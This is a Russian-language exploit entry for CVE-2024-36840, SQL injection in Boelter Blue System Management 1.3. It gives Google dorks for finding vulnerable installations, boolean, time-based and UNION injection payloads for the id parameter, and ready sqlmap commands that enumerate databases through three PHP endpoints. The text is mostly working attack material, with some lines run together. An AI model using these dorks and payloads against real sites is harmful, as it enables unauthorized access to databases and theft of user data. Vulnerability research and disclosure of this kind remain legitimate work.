
Эксплойт для: CVE-2024-36840: уязвимость SQL-инъекции в Boelter Blue System Management (версия 1.3)
Название эксплойта: Уязвимость SQL-инъекции в Boelter Blue System Management (версия 1.3)
Оригинальный Google Dork: inurl:"Powered by Boelter Blue" (не сработал (ноль URL в поиске))
Google Dork от Theexploiters: intext:"Powered by Boelter Blue" (работает)
Дата: 2024-06-04
Автор эксплойта: CBKB (DeadlyData, R4d1x)
Домашняя страница вендора: Boelter Blue
Ссылка на ПО: Google Play Store
Версия: 1.3
Протестировано на: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
CVE: CVE-2024-36840
В Boelter Blue System Management (версия 1.3) выявлено множество уязвимостей SQL-инъекций. Эти уязвимости позволяют злоумышленникам внедрять и выполнять произвольные SQL-команды через различные параметры. Успешная эксплуатация может привести к несанкционированному доступу, утечке данных и возможному захвату учётных записей.
Параметр: id (GET)
id=10071 AND 4036=4036Тип: Time-based blind (слепая инъекция на основе времени)
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Тип: UNION query (запрос UNION)
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs